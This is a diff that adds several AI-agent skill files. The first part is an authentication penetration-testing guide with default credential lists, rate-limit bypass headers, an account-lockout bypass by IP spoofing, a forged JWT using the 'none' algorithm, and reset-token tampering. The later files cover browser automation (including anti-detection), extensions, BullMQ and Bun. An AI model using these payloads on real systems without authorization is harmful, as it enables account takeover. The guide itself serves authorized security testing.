### Common Vulnerability Types

| Vulnerability | Risk | Test Method |
|--------------|------|-------------|
| Weak passwords | High | Policy testing, dictionary attack |
| No lockout | High | Brute force testing |
| Username enumeration | Medium | Differential response analysis |
| Session fixation | High | Pre/post-login session comparison |
| Weak session tokens | High | Entropy analysis |
| No session timeout | Medium | Long-duration session testing |
| Insecure password reset | High | Token analysis, workflow bypass |
| MFA bypass | Critical | Direct access, response manipulation |

### Credential Testing Payloads

```bash
# Default credentials
admin:admin
admin:password
admin:123456
root:root
test:test
user:user

# Common passwords
123456
password
12345678
qwerty
abc123
password1
admin123

# Breached credential databases
- Have I Been Pwned dataset
- SecLists passwords
- Custom targeted lists
```

### Session Cookie Flags

| Flag | Purpose | Vulnerability if Missing |
|------|---------|--------------------------|
| HttpOnly | Prevent JS access | XSS can steal session |
| Secure | HTTPS only | Sent over HTTP |
| SameSite | CSRF protection | Cross-site requests allowed |
| Path | URL scope | Broader exposure |
| Domain | Domain scope | Subdomain access |
| Expires | Lifetime | Persistent sessions |
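The flags in the table can be checked mechanically from a raw `Set-Cookie` value (standalone sketch; the header string is a synthetic example):

```python
def missing_cookie_flags(set_cookie_header):
    """Return security flags absent from a Set-Cookie header value."""
    attrs = {part.strip().split("=")[0].lower()
             for part in set_cookie_header.split(";")[1:]}
    required = ["HttpOnly", "Secure", "SameSite"]
    return [flag for flag in required if flag.lower() not in attrs]

header = "SESSIONID=abc123def456; Path=/; HttpOnly"
print(missing_cookie_flags(header))  # ['Secure', 'SameSite']
```

Run it over every `Set-Cookie` header captured in the proxy log; each non-empty result maps directly to a row of the table.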
### Rate Limiting Bypass Headers

```http
X-Forwarded-For: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
True-Client-IP: 127.0.0.1
```

## Constraints and Limitations

### Legal Requirements
- Only test with explicit written authorization
- Avoid testing with real breached credentials
- Do not access actual user accounts
- Document all testing activities

### Technical Limitations
- CAPTCHA may prevent automated testing
- Rate limiting affects brute force timing
- MFA significantly increases attack difficulty
- Some vulnerabilities require victim interaction

### Scope Considerations
- Test accounts may behave differently than production
- Some features may be disabled in test environments
- Third-party authentication may be out of scope
- Production testing requires extra caution

## Examples

### Example 1: Account Lockout Bypass

**Scenario:** Test if account lockout can be bypassed

```bash
# Step 1: Identify lockout threshold
# Try 5 wrong passwords for admin account
# Result: "Account locked for 30 minutes"

# Step 2: Test bypass via IP rotation
# Use X-Forwarded-For header
POST /login HTTP/1.1
X-Forwarded-For: 192.168.1.1
username=admin&password=attempt1

# Increment IP for each attempt
X-Forwarded-For: 192.168.1.2
# Continue until successful or confirmed blocked

# Step 3: Test bypass via case manipulation
username=Admin (vs admin)
username=ADMIN
# Some systems treat these as different accounts
```

### Example 2: JWT Token Attack

**Scenario:** Exploit weak JWT implementation

```bash
# Step 1: Capture JWT token
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidGVzdCJ9.signature

# Step 2: Decode and analyze
# Header: {"alg":"HS256","typ":"JWT"}
# Payload: {"user":"test"}

# Step 3: Try "none" algorithm attack
# Change header to: {"alg":"none","typ":"JWT"}
# Remove signature
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4iLCJyb2xlIjoiYWRtaW4ifQ.

# Step 4: Submit modified token
Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.
```
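The decode step can be done with the standard library alone (standalone sketch using the token captured in Step 1):

```python
import base64
import json

def decode_jwt_part(part):
    """Base64url-decode one JWT segment, restoring any stripped padding."""
    padded = part + "=" * (-len(part) % 4)
    return json.loads(base64.urlsafe_b64decode(padded))

token = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9"
         ".eyJ1c2VyIjoidGVzdCJ9.signature")
header_part, payload_part, _sig = token.split(".")
print(decode_jwt_part(header_part))   # {'alg': 'HS256', 'typ': 'JWT'}
print(decode_jwt_part(payload_part))  # {'user': 'test'}
```

Decoding only; it does not verify the signature, which is exactly why inspecting and re-encoding a modified header is possible in the "none" attack.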
### Example 3: Password Reset Token Exploitation

**Scenario:** Test password reset functionality

```bash
# Step 1: Request reset for test account
POST /forgot-password
email=test@example.com

# Step 2: Capture reset link
https://target.com/reset?token=a1b2c3d4e5f6

# Step 3: Test token properties
# Reuse: Try using same token twice
# Expiration: Wait 24+ hours and retry
# Modification: Change characters in token

# Step 4: Test for user parameter manipulation
https://target.com/reset?token=a1b2c3d4e5f6&email=admin@example.com
# Check if admin's password can be reset with test user's token
```

## Troubleshooting

| Issue | Solutions |
|-------|-----------|
| Brute force too slow | Identify rate limit scope; IP rotation; add delays; use targeted wordlists |
| Session analysis inconclusive | Collect 1000+ tokens; use statistical tools; check for timestamps; compare accounts |
| MFA cannot be bypassed | Document as secure; test backup/recovery mechanisms; check MFA fatigue; verify enrollment |
| Account lockout prevents testing | Request multiple test accounts; test threshold first; use slower timing |
70 skills/browser-automation/SKILL.md Normal file
@@ -0,0 +1,70 @@
---
name: browser-automation
description: "Browser automation powers web testing, scraping, and AI agent interactions. The difference between a flaky script and a reliable system comes down to understanding selectors, waiting strategies, and anti-detection patterns. This skill covers Playwright (recommended) and Puppeteer, with patterns for testing, scraping, and agentic browser control. Key insight: Playwright won the framework war. Unless you need Puppeteer's stealth ecosystem or are Chrome-only, Playwright is the better choice in 202"
source: vibeship-spawner-skills (Apache 2.0)
---

# Browser Automation

You are a browser automation expert who has debugged thousands of flaky tests
and built scrapers that run for years without breaking. You've seen the
evolution from Selenium to Puppeteer to Playwright and understand exactly
when each tool shines.

Your core insight: most automation failures come from three sources - bad
selectors, missing waits, and detection systems. You teach people to think
like the browser, use the right selectors, and let Playwright's auto-wait
do its job.

For scraping, yo

## Capabilities

- browser-automation
- playwright
- puppeteer
- headless-browsers
- web-scraping
- browser-testing
- e2e-testing
- ui-automation
- selenium-alternatives

## Patterns

### Test Isolation Pattern

Each test runs in complete isolation with fresh state

### User-Facing Locator Pattern

Select elements the way users see them

### Auto-Wait Pattern

Let Playwright wait automatically, never add manual waits

## Anti-Patterns

### ❌ Arbitrary Timeouts

### ❌ CSS/XPath First

### ❌ Single Browser Context for Everything

## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| Issue | critical | Remove all waitForTimeout calls |
| Issue | high | Use user-facing locators instead |
| Issue | high | Use stealth plugins |
| Issue | high | Each test must be fully isolated |
| Issue | medium | Enable traces for failures |
| Issue | medium | Set consistent viewport |
| Issue | high | Add delays between requests |
| Issue | medium | Wait for popup BEFORE triggering it |
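The "add delays between requests" fix is usually a jittered, capped backoff rather than a fixed sleep; a framework-agnostic sketch (names and defaults are illustrative):

```python
import random

def scrape_delay(attempt, base=1.0, cap=30.0):
    """Seconds to sleep before the next request: exponential backoff with jitter."""
    delay = min(cap, base * (2 ** attempt))
    return random.uniform(delay / 2, delay)  # jitter avoids a detectable rhythm

# Delays grow with each retry but never exceed the cap
for attempt in range(6):
    print(f"attempt {attempt}: sleep {scrape_delay(attempt):.1f}s")
```

The jitter matters as much as the backoff: perfectly periodic requests are one of the easiest bot signals to detect.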
## Related Skills

Works well with: `agent-tool-builder`, `workflow-automation`, `computer-use-agents`, `test-architect`
261 skills/browser-extension-builder/SKILL.md Normal file
@@ -0,0 +1,261 @@
|
||||
---
|
||||
name: browser-extension-builder
|
||||
description: "Expert in building browser extensions that solve real problems - Chrome, Firefox, and cross-browser extensions. Covers extension architecture, manifest v3, content scripts, popup UIs, monetization strategies, and Chrome Web Store publishing. Use when: browser extension, chrome extension, firefox addon, extension, manifest v3."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# Browser Extension Builder
|
||||
|
||||
**Role**: Browser Extension Architect
|
||||
|
||||
You extend the browser to give users superpowers. You understand the
|
||||
unique constraints of extension development - permissions, security,
|
||||
store policies. You build extensions that people install and actually
|
||||
use daily. You know the difference between a toy and a tool.
|
||||
|
||||
## Capabilities
|
||||
|
||||
- Extension architecture
|
||||
- Manifest v3 (MV3)
|
||||
- Content scripts
|
||||
- Background workers
|
||||
- Popup interfaces
|
||||
- Extension monetization
|
||||
- Chrome Web Store publishing
|
||||
- Cross-browser support
|
||||
|
||||
## Patterns
|
||||
|
||||
### Extension Architecture
|
||||
|
||||
Structure for modern browser extensions
|
||||
|
||||
**When to use**: When starting a new extension
|
||||
|
||||
```javascript
|
||||
## Extension Architecture
|
||||
|
||||
### Project Structure
|
||||
```
|
||||
extension/
|
||||
├── manifest.json # Extension config
|
||||
├── popup/
|
||||
│ ├── popup.html # Popup UI
|
||||
│ ├── popup.css
|
||||
│ └── popup.js
|
||||
├── content/
|
||||
│ └── content.js # Runs on web pages
|
||||
├── background/
|
||||
│ └── service-worker.js # Background logic
|
||||
├── options/
|
||||
│ ├── options.html # Settings page
|
||||
│ └── options.js
|
||||
└── icons/
|
||||
├── icon16.png
|
||||
├── icon48.png
|
||||
└── icon128.png
|
||||
```
|
||||
|
||||
### Manifest V3 Template
|
||||
```json
|
||||
{
|
||||
"manifest_version": 3,
|
||||
"name": "My Extension",
|
||||
"version": "1.0.0",
|
||||
"description": "What it does",
|
||||
"permissions": ["storage", "activeTab"],
|
||||
"action": {
|
||||
"default_popup": "popup/popup.html",
|
||||
"default_icon": {
|
||||
"16": "icons/icon16.png",
|
||||
"48": "icons/icon48.png",
|
||||
"128": "icons/icon128.png"
|
||||
}
|
||||
},
|
||||
"content_scripts": [{
|
||||
"matches": ["<all_urls>"],
|
||||
"js": ["content/content.js"]
|
||||
}],
|
||||
"background": {
|
||||
"service_worker": "background/service-worker.js"
|
||||
},
|
||||
"options_page": "options/options.html"
|
||||
}
|
||||
```
|
||||
|
||||
### Communication Pattern
|
||||
```
|
||||
Popup ←→ Background (Service Worker) ←→ Content Script
|
||||
↓
|
||||
chrome.storage
|
||||
```
|
||||
```
|
||||
|
||||
### Content Scripts
|
||||
|
||||
Code that runs on web pages
|
||||
|
||||
**When to use**: When modifying or reading page content
|
||||
|
||||
```javascript
|
||||
## Content Scripts
|
||||
|
||||
### Basic Content Script
|
||||
```javascript
|
||||
// content.js - Runs on every matched page
|
||||
|
||||
// Wait for page to load
|
||||
document.addEventListener('DOMContentLoaded', () => {
|
||||
// Modify the page
|
||||
const element = document.querySelector('.target');
|
||||
if (element) {
|
||||
element.style.backgroundColor = 'yellow';
|
||||
}
|
||||
});
|
||||
|
||||
// Listen for messages from popup/background
|
||||
chrome.runtime.onMessage.addListener((message, sender, sendResponse) => {
|
||||
if (message.action === 'getData') {
|
||||
const data = document.querySelector('.data')?.textContent;
|
||||
sendResponse({ data });
|
||||
}
|
||||
return true; // Keep channel open for async
|
||||
});
|
||||
```
|
||||
|
||||
### Injecting UI

```javascript
// Create floating UI on page
function injectUI() {
  const container = document.createElement('div');
  container.id = 'my-extension-ui';
  container.innerHTML = `
    <div style="position: fixed; bottom: 20px; right: 20px;
                background: white; padding: 16px; border-radius: 8px;
                box-shadow: 0 4px 12px rgba(0,0,0,0.15); z-index: 10000;">
      <h3>My Extension</h3>
      <button id="my-extension-btn">Click me</button>
    </div>
  `;
  document.body.appendChild(container);

  document.getElementById('my-extension-btn').addEventListener('click', () => {
    // Handle click
  });
}

injectUI();
```

### Permissions for Content Scripts

```json
{
  "content_scripts": [{
    "matches": ["https://specific-site.com/*"],
    "js": ["content.js"],
    "run_at": "document_end"
  }]
}
```
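The `"matches"` patterns above decide which pages the script is injected into. As a rough sketch of how such a pattern selects URLs (real Chrome match patterns have extra rules for schemes and hosts that this deliberately skips), a pattern can be compiled to a regular expression:

```javascript
// Simplified sketch: turn a "matches"-style pattern into a RegExp.
// Real Chrome match patterns have more rules (scheme wildcards, host
// wildcards); this only handles the common literal-plus-* shape.
function patternToRegExp(pattern) {
  // Escape regex metacharacters, but leave '*' as the wildcard token
  const escaped = pattern.replace(/[.+?^${}()|[\]\\]/g, '\\$&');
  return new RegExp('^' + escaped.replace(/\*/g, '.*') + '$');
}

const re = patternToRegExp('https://specific-site.com/*');
console.log(re.test('https://specific-site.com/page')); // true
console.log(re.test('https://other-site.com/page'));    // false
```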
### Storage and State

Persisting extension data

**When to use**: When saving user settings or data

### Chrome Storage API

```javascript
// Save data
chrome.storage.local.set({ key: 'value' }, () => {
  console.log('Saved');
});

// Get data
chrome.storage.local.get(['key'], (result) => {
  console.log(result.key);
});

// Sync storage (syncs across devices)
chrome.storage.sync.set({ setting: true });

// Watch for changes
chrome.storage.onChanged.addListener((changes, area) => {
  if (changes.key) {
    console.log('key changed:', changes.key.newValue);
  }
});
```
### Storage Limits

| Type | Limit |
|------|-------|
| local | 5MB |
| sync | 100KB total, 8KB per item |

### Async/Await Pattern

```javascript
// Modern async wrapper
async function getStorage(keys) {
  return new Promise((resolve) => {
    chrome.storage.local.get(keys, resolve);
  });
}

async function setStorage(data) {
  return new Promise((resolve) => {
    chrome.storage.local.set(data, resolve);
  });
}

// Usage
const { settings } = await getStorage(['settings']);
await setStorage({ settings: { ...settings, theme: 'dark' } });
```
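Those wrappers can be exercised outside a browser by swapping in a minimal in-memory stand-in for `chrome.storage.local` (the mock below is an assumption for illustration; the real API exists only in extensions):

```javascript
// In-memory stand-in for chrome.storage.local, mimicking its callback API
const store = {};
const chrome = {
  storage: {
    local: {
      get(keys, cb) {
        const out = {};
        for (const k of keys) if (k in store) out[k] = store[k];
        cb(out);
      },
      set(data, cb) {
        Object.assign(store, data);
        cb();
      },
    },
  },
};

// The same promise wrappers as above
const getStorage = (keys) =>
  new Promise((resolve) => chrome.storage.local.get(keys, resolve));
const setStorage = (data) =>
  new Promise((resolve) => chrome.storage.local.set(data, resolve));

(async () => {
  await setStorage({ settings: { theme: 'light' } });
  const { settings } = await getStorage(['settings']);
  await setStorage({ settings: { ...settings, theme: 'dark' } });
  console.log((await getStorage(['settings'])).settings.theme); // "dark"
})();
```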
## Anti-Patterns

### ❌ Requesting All Permissions

**Why bad**: Users won't install it, the store may reject it, it widens the security risk, and it invites bad reviews.

**Instead**: Request the minimum needed. Use optional permissions. Explain why in the description. Request at time of use.

### ❌ Heavy Background Processing

**Why bad**: MV3 terminates idle workers, battery drains, the browser slows down, and users uninstall.

**Instead**: Keep the background script minimal. Use alarms for periodic tasks. Offload work to content scripts. Cache aggressively.

### ❌ Breaking on Updates

**Why bad**: Site selectors change, APIs change, and the result is angry users and bad reviews.

**Instead**: Use stable selectors. Add error handling. Monitor for breakage. Update quickly when broken.

## Related Skills

Works well with: `frontend`, `micro-saas-launcher`, `personal-tool-builder`
skills/bullmq-specialist/SKILL.md (new file, 57 lines)
---
name: bullmq-specialist
description: "BullMQ expert for Redis-backed job queues, background processing, and reliable async execution in Node.js/TypeScript applications. Use when: bullmq, bull queue, redis queue, background job, job queue."
source: vibeship-spawner-skills (Apache 2.0)
---

# BullMQ Specialist

You are a BullMQ expert who has processed billions of jobs in production.
You understand that queues are the backbone of scalable applications - they
decouple services, smooth traffic spikes, and enable reliable async processing.

You've debugged stuck jobs at 3am, optimized worker concurrency for maximum
throughput, and designed job flows that handle complex multi-step processes.
You know that most queue problems are actually Redis problems or application
design problems.

## Capabilities

- bullmq-queues
- job-scheduling
- delayed-jobs
- repeatable-jobs
- job-priorities
- rate-limiting-jobs
- job-events
- worker-patterns
- flow-producers
- job-dependencies

## Patterns

### Basic Queue Setup

Production-ready BullMQ queue with proper configuration

### Delayed and Scheduled Jobs

Jobs that run at specific times or after delays

### Job Flows and Dependencies

Complex multi-step job processing with parent-child relationships

## Anti-Patterns

### ❌ Giant Job Payloads

### ❌ No Dead Letter Queue

### ❌ Infinite Concurrency

## Related Skills

Works well with: `redis-specialist`, `backend`, `nextjs-app-router`, `email-systems`, `ai-workflow-automation`, `performance-hunter`
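A real BullMQ example needs a running Redis instance, so as a dependency-free illustration of the job-priorities capability listed above, here is the ordering idea in miniature: lower priority number runs first, and jobs with equal priority keep FIFO order. This is only a sketch of the concept, not BullMQ's Redis-backed implementation; class and method names are invented for illustration.

```javascript
// In-memory sketch of priority ordering: lower `priority` dequeues first,
// ties break by insertion order (FIFO).
class PriorityJobQueue {
  constructor() {
    this.jobs = [];
    this.seq = 0; // insertion counter for stable FIFO tie-breaking
  }
  add(name, data, { priority = 0 } = {}) {
    this.jobs.push({ name, data, priority, seq: this.seq++ });
  }
  next() {
    if (this.jobs.length === 0) return undefined;
    this.jobs.sort((a, b) => a.priority - b.priority || a.seq - b.seq);
    return this.jobs.shift();
  }
}

const q = new PriorityJobQueue();
q.add('send-newsletter', {}, { priority: 10 });
q.add('password-reset', {}, { priority: 1 });
q.add('welcome-email', {}, { priority: 1 });
console.log(q.next().name); // "password-reset"
console.log(q.next().name); // "welcome-email"
console.log(q.next().name); // "send-newsletter"
```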
skills/bun-development/SKILL.md (new file, 691 lines)
---
name: bun-development
description: "Modern JavaScript/TypeScript development with Bun runtime. Covers package management, bundling, testing, and migration from Node.js. Use when working with Bun, optimizing JS/TS development speed, or migrating from Node.js to Bun."
---

# ⚡ Bun Development

> Fast, modern JavaScript/TypeScript development with the Bun runtime, inspired by [oven-sh/bun](https://github.com/oven-sh/bun).

## When to Use This Skill

Use this skill when:

- Starting new JS/TS projects with Bun
- Migrating from Node.js to Bun
- Optimizing development speed
- Using Bun's built-in tools (bundler, test runner)
- Troubleshooting Bun-specific issues

---

## 1. Getting Started

### 1.1 Installation

```bash
# macOS / Linux
curl -fsSL https://bun.sh/install | bash

# Windows
powershell -c "irm bun.sh/install.ps1 | iex"

# Homebrew
brew tap oven-sh/bun
brew install bun

# npm (if needed)
npm install -g bun

# Upgrade
bun upgrade
```

### 1.2 Why Bun?

| Feature | Bun | Node.js |
| :-------------- | :------------- | :-------------------------- |
| Startup time | ~25ms | ~100ms+ |
| Package install | 10-100x faster | Baseline |
| TypeScript | Native | Requires transpiler |
| JSX | Native | Requires transpiler |
| Test runner | Built-in | External (Jest, Vitest) |
| Bundler | Built-in | External (Webpack, esbuild) |

---
## 2. Project Setup

### 2.1 Create New Project

```bash
# Initialize project
bun init

# Creates:
# ├── package.json
# ├── tsconfig.json
# ├── index.ts
# └── README.md

# With specific template
bun create <template> <project-name>

# Examples
bun create react my-app    # React app
bun create next my-app     # Next.js app
bun create vite my-app     # Vite app
bun create elysia my-api   # Elysia API
```

### 2.2 package.json

```json
{
  "name": "my-bun-project",
  "version": "1.0.0",
  "module": "index.ts",
  "type": "module",
  "scripts": {
    "dev": "bun run --watch index.ts",
    "start": "bun run index.ts",
    "test": "bun test",
    "build": "bun build ./index.ts --outdir ./dist",
    "lint": "bunx eslint ."
  },
  "devDependencies": {
    "@types/bun": "latest"
  },
  "peerDependencies": {
    "typescript": "^5.0.0"
  }
}
```

### 2.3 tsconfig.json (Bun-optimized)

```json
{
  "compilerOptions": {
    "lib": ["ESNext"],
    "module": "esnext",
    "target": "esnext",
    "moduleResolution": "bundler",
    "moduleDetection": "force",
    "allowImportingTsExtensions": true,
    "noEmit": true,
    "composite": true,
    "strict": true,
    "downlevelIteration": true,
    "skipLibCheck": true,
    "jsx": "react-jsx",
    "allowSyntheticDefaultImports": true,
    "forceConsistentCasingInFileNames": true,
    "allowJs": true,
    "types": ["bun-types"]
  }
}
```

---
## 3. Package Management

### 3.1 Installing Packages

```bash
# Install from package.json
bun install               # or 'bun i'

# Add dependencies
bun add express           # Regular dependency
bun add -d typescript     # Dev dependency
bun add -D @types/node    # Dev dependency (alias)
bun add --optional pkg    # Optional dependency

# From specific registry
bun add lodash --registry https://registry.npmmirror.com

# Install specific version
bun add react@18.2.0
bun add react@latest
bun add react@next

# From git
bun add github:user/repo
bun add git+https://github.com/user/repo.git
```

### 3.2 Removing & Updating

```bash
# Remove package
bun remove lodash

# Update packages
bun update            # Update all
bun update lodash     # Update specific
bun update --latest   # Update to latest (ignore ranges)

# Check outdated
bun outdated
```

### 3.3 bunx (npx equivalent)

```bash
# Execute package binaries
bunx prettier --write .
bunx tsc --init
bunx create-react-app my-app

# With specific version
bunx -p typescript@4.9 tsc --version

# Run without installing
bunx cowsay "Hello from Bun!"
```

### 3.4 Lockfile

```bash
# bun.lockb is a binary lockfile (faster parsing)
# To generate text lockfile for debugging:
bun install --yarn    # Creates yarn.lock

# Trust existing lockfile
bun install --frozen-lockfile
```

---
## 4. Running Code

### 4.1 Basic Execution

```bash
# Run TypeScript directly (no build step!)
bun run index.ts

# Run JavaScript
bun run index.js

# Run with arguments
bun run server.ts --port 3000

# Run package.json script
bun run dev
bun run build

# Short form (for scripts; note that built-in commands like `bun build`
# take precedence over a script of the same name)
bun dev
```

### 4.2 Watch Mode

```bash
# Auto-restart on file changes
bun --watch run index.ts

# With hot reloading
bun --hot run server.ts
```

### 4.3 Environment Variables

```typescript
// .env file is loaded automatically!

// Access environment variables
const apiKey = Bun.env.API_KEY;
const port = Bun.env.PORT ?? "3000";

// Or use process.env (Node.js compatible)
const dbUrl = process.env.DATABASE_URL;
```

```bash
# Run with specific env file
bun --env-file=.env.production run index.ts
```
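Bun loads `.env` files for you, so you never parse them by hand; still, a minimal sketch of what that loading does can make the behavior concrete. This is an illustration only; real `.env` parsers (including Bun's) also handle quoting, `export` prefixes, and multiline values.

```javascript
// Minimal sketch of .env parsing: KEY=VALUE per line, '#' starts a comment.
function parseEnv(text) {
  const env = {};
  for (const line of text.split('\n')) {
    const trimmed = line.trim();
    if (!trimmed || trimmed.startsWith('#')) continue; // skip blanks/comments
    const eq = trimmed.indexOf('=');
    if (eq === -1) continue; // ignore malformed lines
    env[trimmed.slice(0, eq).trim()] = trimmed.slice(eq + 1).trim();
  }
  return env;
}

const env = parseEnv('# local config\nPORT=3000\nDATABASE_URL=postgres://localhost/dev\n');
console.log(env.PORT); // "3000"
```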
---

## 5. Built-in APIs

### 5.1 File System (Bun.file)

```typescript
// Read file
const file = Bun.file("./data.json");
const text = await file.text();
const json = await file.json();
const buffer = await file.arrayBuffer();

// File info
console.log(file.size); // bytes
console.log(file.type); // MIME type

// Write file
await Bun.write("./output.txt", "Hello, Bun!");
await Bun.write("./data.json", JSON.stringify({ foo: "bar" }));

// Stream large files
const reader = file.stream();
for await (const chunk of reader) {
  console.log(chunk);
}
```

### 5.2 HTTP Server (Bun.serve)

```typescript
const server = Bun.serve({
  port: 3000,

  fetch(request) {
    const url = new URL(request.url);

    if (url.pathname === "/") {
      return new Response("Hello World!");
    }

    if (url.pathname === "/api/users") {
      return Response.json([
        { id: 1, name: "Alice" },
        { id: 2, name: "Bob" },
      ]);
    }

    return new Response("Not Found", { status: 404 });
  },

  error(error) {
    return new Response(`Error: ${error.message}`, { status: 500 });
  },
});

console.log(`Server running at http://localhost:${server.port}`);
```
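The `fetch` handler above is a chain of `if` statements; a common refinement is a table-driven route lookup. The sketch below shows that shape with plain objects standing in for `Response`, so the lookup logic itself can run outside Bun:

```javascript
// Table-driven version of the fetch handler. Plain objects stand in for
// Response here so the routing logic is runnable anywhere.
const routes = {
  '/': () => ({ status: 200, body: 'Hello World!' }),
  '/api/users': () => ({
    status: 200,
    body: JSON.stringify([{ id: 1, name: 'Alice' }, { id: 2, name: 'Bob' }]),
  }),
};

function handle(requestUrl) {
  const { pathname } = new URL(requestUrl); // URL is a standard global
  const route = routes[pathname];
  return route ? route() : { status: 404, body: 'Not Found' };
}

console.log(handle('http://localhost:3000/').body);          // "Hello World!"
console.log(handle('http://localhost:3000/missing').status); // 404
```

Inside `Bun.serve`, each route function would return a real `Response` instead.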
### 5.3 WebSocket Server

```typescript
const server = Bun.serve({
  port: 3000,

  fetch(req, server) {
    // Upgrade to WebSocket
    if (server.upgrade(req)) {
      return; // Upgraded
    }
    return new Response("Upgrade failed", { status: 500 });
  },

  websocket: {
    open(ws) {
      console.log("Client connected");
      ws.send("Welcome!");
    },

    message(ws, message) {
      console.log(`Received: ${message}`);
      ws.send(`Echo: ${message}`);
    },

    close(ws) {
      console.log("Client disconnected");
    },
  },
});
```

### 5.4 SQLite (bun:sqlite)

```typescript
import { Database } from "bun:sqlite";

const db = new Database("mydb.sqlite");

// Create table
db.run(`
  CREATE TABLE IF NOT EXISTS users (
    id INTEGER PRIMARY KEY AUTOINCREMENT,
    name TEXT NOT NULL,
    email TEXT UNIQUE
  )
`);

// Insert
const insert = db.prepare("INSERT INTO users (name, email) VALUES (?, ?)");
insert.run("Alice", "alice@example.com");

// Query
const query = db.prepare("SELECT * FROM users WHERE name = ?");
const user = query.get("Alice");
console.log(user); // { id: 1, name: "Alice", email: "alice@example.com" }

// Query all
const allUsers = db.query("SELECT * FROM users").all();
```

### 5.5 Password Hashing

```typescript
// Hash password
const password = "super-secret";
const hash = await Bun.password.hash(password);

// Verify password
const isValid = await Bun.password.verify(password, hash);
console.log(isValid); // true

// With algorithm options
const bcryptHash = await Bun.password.hash(password, {
  algorithm: "bcrypt",
  cost: 12,
});
```
---

## 6. Testing

### 6.1 Basic Tests

```typescript
// math.test.ts
import { describe, it, expect, beforeAll, afterAll } from "bun:test";

describe("Math operations", () => {
  it("adds two numbers", () => {
    expect(1 + 1).toBe(2);
  });

  it("subtracts two numbers", () => {
    expect(5 - 3).toBe(2);
  });
});
```

### 6.2 Running Tests

```bash
# Run all tests
bun test

# Run specific file
bun test math.test.ts

# Run matching pattern
bun test --grep "adds"

# Watch mode
bun test --watch

# With coverage
bun test --coverage

# Timeout
bun test --timeout 5000
```

### 6.3 Matchers

```typescript
import { expect, test } from "bun:test";

test("matchers", async () => {
  // Equality
  expect(1).toBe(1);
  expect({ a: 1 }).toEqual({ a: 1 });
  expect([1, 2]).toContain(1);

  // Comparisons
  expect(10).toBeGreaterThan(5);
  expect(5).toBeLessThanOrEqual(5);

  // Truthiness
  expect(true).toBeTruthy();
  expect(null).toBeNull();
  expect(undefined).toBeUndefined();

  // Strings
  expect("hello").toMatch(/ell/);
  expect("hello").toContain("ell");

  // Arrays
  expect([1, 2, 3]).toHaveLength(3);

  // Exceptions
  expect(() => {
    throw new Error("fail");
  }).toThrow("fail");

  // Async (requires the async callback above)
  await expect(Promise.resolve(1)).resolves.toBe(1);
  await expect(Promise.reject("err")).rejects.toBe("err");
});
```

### 6.4 Mocking

```typescript
import { mock, spyOn } from "bun:test";

// Mock function
const mockFn = mock((x: number) => x * 2);
mockFn(5);
expect(mockFn).toHaveBeenCalled();
expect(mockFn).toHaveBeenCalledWith(5);
expect(mockFn.mock.results[0].value).toBe(10);

// Spy on method
const obj = {
  method: () => "original",
};
const spy = spyOn(obj, "method").mockReturnValue("mocked");
expect(obj.method()).toBe("mocked");
expect(spy).toHaveBeenCalled();
```
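The `mockFn.mock.calls` / `mockFn.mock.results` bookkeeping used above is easy to demystify: a mock is just a wrapper that records every call's arguments and return value. A dependency-free sketch of the idea (not Bun's actual implementation):

```javascript
// Sketch of what a test framework's mock() does: wrap a function and
// record each call's arguments and return value.
function createMock(impl) {
  const mockFn = (...args) => {
    const value = impl(...args);
    mockFn.mock.calls.push(args);
    mockFn.mock.results.push({ value });
    return value;
  };
  mockFn.mock = { calls: [], results: [] };
  return mockFn;
}

const double = createMock((x) => x * 2);
double(5);
console.log(double.mock.calls[0]);         // [ 5 ]
console.log(double.mock.results[0].value); // 10
```

Assertions like `toHaveBeenCalledWith(5)` are then just lookups into that recorded call list.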
---

## 7. Bundling

### 7.1 Basic Build

```bash
# Bundle for production
bun build ./src/index.ts --outdir ./dist

# With options
bun build ./src/index.ts \
  --outdir ./dist \
  --target browser \
  --minify \
  --sourcemap
```

### 7.2 Build API

```typescript
const result = await Bun.build({
  entrypoints: ["./src/index.ts"],
  outdir: "./dist",
  target: "browser", // or "bun", "node"
  minify: true,
  sourcemap: "external",
  splitting: true,
  format: "esm",

  // External packages (not bundled)
  external: ["react", "react-dom"],

  // Define globals
  define: {
    "process.env.NODE_ENV": JSON.stringify("production"),
  },

  // Naming
  naming: {
    entry: "[name].[hash].js",
    chunk: "chunks/[name].[hash].js",
    asset: "assets/[name].[hash][ext]",
  },
});

if (!result.success) {
  console.error(result.logs);
}
```
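The `naming` templates above work by token substitution: the bundler replaces `[name]`, `[hash]`, and `[ext]` with values computed per output file. A small sketch of that substitution (the token set mirrors the options above; the values are made up for illustration):

```javascript
// Sketch of naming-template expansion: replace [name]/[hash]/[ext] tokens.
function expandTemplate(template, values) {
  return template.replace(/\[(name|hash|ext)\]/g, (_, token) => values[token] ?? '');
}

console.log(expandTemplate('[name].[hash].js', { name: 'index', hash: 'a1b2c3' }));
// "index.a1b2c3.js"
console.log(expandTemplate('assets/[name].[hash][ext]', { name: 'logo', hash: 'ff00', ext: '.png' }));
// "assets/logo.ff00.png"
```

Content hashes in the filename let browsers cache outputs forever, since any change produces a new name.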
### 7.3 Compile to Executable

```bash
# Create standalone executable
bun build ./src/cli.ts --compile --outfile myapp

# Cross-compile
bun build ./src/cli.ts --compile --target=bun-linux-x64 --outfile myapp-linux
bun build ./src/cli.ts --compile --target=bun-darwin-arm64 --outfile myapp-mac

# With embedded assets
bun build ./src/cli.ts --compile --outfile myapp --embed ./assets
```

---
## 8. Migration from Node.js

### 8.1 Compatibility

```typescript
// Most Node.js APIs work out of the box
import fs from "fs";
import path from "path";
import crypto from "crypto";

// process is global
console.log(process.cwd());
console.log(process.env.HOME);

// Buffer is global
const buf = Buffer.from("hello");

// __dirname and __filename work
console.log(__dirname);
console.log(__filename);
```

### 8.2 Common Migration Steps

```bash
# 1. Install Bun
curl -fsSL https://bun.sh/install | bash

# 2. Replace package manager
rm -rf node_modules package-lock.json
bun install

# 3. Update scripts in package.json
# "start": "node index.js" → "start": "bun run index.ts"
# "test": "jest"           → "test": "bun test"

# 4. Add Bun types
